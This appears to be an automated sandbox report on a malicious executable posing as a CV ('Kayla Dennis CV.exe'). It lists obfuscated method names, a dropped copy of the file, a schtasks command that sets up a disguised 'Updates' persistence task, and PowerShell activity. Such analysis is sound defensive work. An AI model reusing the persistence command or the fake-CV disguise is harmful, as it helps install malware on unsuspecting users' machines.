                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, zeMT1koqZxrLyrXShU.csHigh entropy of concatenated method names: 'kSl2bZ7c8j', 'zVC2fOd46r', 'Od22JtDZlm', 'U5U2XR3lLN', 'lkL21AOism', 'Yd32CYZ7hM', 'U5M2ndtZ3F', 'O2e2wfMXLS', 'b6F2jQIsnI', 'aoe2TDkCtn'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, qFWcJZVwvHTZWf33J1.csHigh entropy of concatenated method names: 'Ojr7TpZypU', 'E7I709nnLq', 'wkN7Vu68hv', 'v3P7Zfv0va', 'LQa7fuBIeE', 'eDK7JVO9RZ', 'iTL7XDouVq', 'Oh5717ufkx', 'x1D7CdQHe7', 'Alv7nPaJKn'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, Et4w0UHHdcftwrrdAtp.csHigh entropy of concatenated method names: 'UeAvdSb4ZQ', 'IX2vzGsBHi', 'gVH6BECLu2', 'm6X6HUWPbY', 'lDT6Sp6Uvg', 'geE6lHmt9R', 'CvH6q81Fe7', 'qqb6cBIBpF', 'BK36WFbO4U', 'cIa6AcK8GZ'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, K9CQNMrr6cZBHfROeJ.csHigh entropy of concatenated method names: 'ToString', 'guoO9VrYpi', 'rdkOfuukvn', 'GImOJODpH8', 'QilOXgKLCE', 'xViO1craXK', 'dmROC8ejpL', 'Ua6Onpog98', 'hMIOwMQhJ1', 'e7TOjwlfGl'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, oyVIcTqqP4C6AwsfEK.csHigh entropy of concatenated method names: 'rJUHy0Wcui', 'fSwHgH93uG', 'uS6HirC03X', 'XOQHGFxe67', 'UdqH7Yjy05', 'wP7HOHCDY9', 'e4Ou1PlVZn1FbSUMMI', 'KEpxqRSxBGMhhnKR7g', 'K6Z1L4jGHejX3XdxPj', 'cNCHHQUBGk'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, rNBnHnp1WKJm5AxIZM.csHigh entropy of concatenated method names: 'ltp27jKoUC', 'ikc2FKrRkY', 'IXm22SMVju', 'Nsp265KOsC', 'J1O2xKNZJQ', 'eMu2mD88QR', 'Dispose', 'H5LKWTj2jg', 'CViKAOxeoP', 'D8FKMG86Jh'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, Ch0lk6HBVj9gH1dXbDR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'B8Iv93e3k5', 'hDcv05MZC4', 'YMtvu5wDCE', 'gFQvVFUkcA', 'MWQvZdEQuL', 'vx1vrnjrBM', 'JMSvhsrxMu'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, qq0i0xtS6rC03X4OQF.csHigh entropy of concatenated method names: 'DPPMY4eC7s', 'M8nMLaAP6K', 'Eq0MQN2xFb', 'h1QMtX7muk', 'CAAM7UofyA', 'a7fMOHTjPd', 'frSMFu4K4t', 'dZmMKCCqru', 'TPYM2AMMUY', 'FdNMv7wZOA'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, EoWQELuK6MS0aI4AZn.csHigh entropy of concatenated method names: 'LcN3QQ3861', 'IOZ3tYvelN', 'SBH3bGHt7a', 'BWl3fF0Mrp', 'ja23XXrhMM', 'Ggw318aOcR', 'EXj3nvJsQB', 'kW53wLJgMl', 'WxS3T1PNJZ', 'dLK39eAaax'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, j05EP7bHCDY9bVeb91.csHigh entropy of concatenated method names: 'HuXUcUK1Wt', 'yAtUA96WRN', 'p5RU5EUSpb', 'kNcUytuXHc', 'XNKUgCaH1Q', 'me45R9T2DP', 'OTc5ayrgrt', 'FZS5p6OhMm', 'FLl54NAG8P', 'NJ55oDCZBG'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, mcLAcvjWC5sDoJTaiB.csHigh entropy of concatenated method names: 'G7lye2NI3l', 'j1NyDSyr5P', 'PrGy8iMkNf', 'XXCyYSCkJL', 'bg1yk0uLmk', 'jgmyLwAXpd', 'WCNyNscGDR', 'XPAyQKFZpJ', 'X5lyt14bPC', 'QdwyIH1veW'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, ve67QJIErbjQ2RdqYj.csHigh entropy of concatenated method names: 'Aot5koFUs9', 'Bvn5NfFVNJ', 'nSeMJvcmYb', 'mDuMXbva5f', 'FvuM1cGliW', 'glOMCI2RB1', 'eAfMnppDA1', 'ItaMwPNlqS', 'H9LMjmoe8p', 'rIRMT1mgpR'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, w1Wamsg80XvcbX1PDi.csHigh entropy of concatenated method names: 'MinlcY01X1', 'buxlW2A0PM', 'pCAlAapHkX', 'zdYlMw9nw9', 'aR2l548Ys8', 'cg5lU0EjOp', 'Fk1lyh2hEa', 'r0GlgC8PMW', 'c15lP4C6iv', 'peIli6pPbW'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, FoAFRBaaCt9wLgIjEA.csHigh entropy of concatenated method names: 'bI2F43Kuhd', 'iPtFdBG81p', 'hMSKBntYOx', 'AnBKHuuUjU', 'UNPF9fXWmr', 'rSqF0RkJL1', 'Jc5FuMe4Gi', 'KetFV6gXMe', 'I9xFZNUtNT', 'jbkFrsD0Xj'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, qfee45ScyUVTNoxrqO.csHigh entropy of concatenated method names: 'r438KqbKP', 'GhaYb3nJP', 'uL1LZ1IhJ', 'xXCNJqLLF', 'xretaYAeJ', 'X4rIsXJkr', 'okUWK9PwRXxVfei56R', 'Usr43lfDOXW0PJ7320', 'pRpKo1xgj', 'UQZvfsAAk'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, XLJX4JHqAW5aPYZSNNV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Q1is2oA8Gd', 'VrOsvcE3Om', 'mtHs66PReB', 'MZSssXyLna', 'U1FsxIDhrk', 'L1RsEnZbLP', 'ejwsmx2FSo'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, qKGIPyzat1P0lbO4vD.csHigh entropy of concatenated method names: 'rPUvLGJ45q', 'l5UvQUXi1R', 'gr1vtiQhxk', 'bUrvbtyXZB', 'MpKvfQGK9v', 'AcGvXnUjYL', 'X4dv1gpMMA', 'CIlvmiYf0u', 'qngvedj0qJ', 'R8FvDRF3bv'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, i0WcuiQWSwH93uGufO.csHigh entropy of concatenated method names: 'UDKAV7WacB', 'NGqAZYdiCx', 'IumArdoEWb', 'q3sAhNXYUC', 'Yf0ARC1XLT', 'N44Aash1g4', 'EsZAp2VnQ4', 'BHyA4ZCssE', 'fapAoCYMBF', 'D8CAd5Ngg6'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, uwQd63hVoUjkE35mIB.csHigh entropy of concatenated method names: 'ehoFiZGsZt', 'G54FGnFHS9', 'ToString', 'JnnFWK9XIj', 'WLeFA4QgJo', 'TfZFMaBdJq', 'qdDF5mCkLb', 'aVFFUqDdId', 'yK1Fyd2LBE', 'TETFgDy7u1'
                Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, xKwrqWApA4CjlIblEN.csHigh entropy of concatenated method names: 'Dispose', 'rJmHo5AxIZ', 'OTySfiHa95', 'zKGsRrLkOU', 'gf7HdXJ9qh', 'AiYHzwrMHp', 'ProcessDialogKey', 'Nd8SBeMT1k', 'eZxSHrLyrX', 'chUSSYZBwc'
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeFile created: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
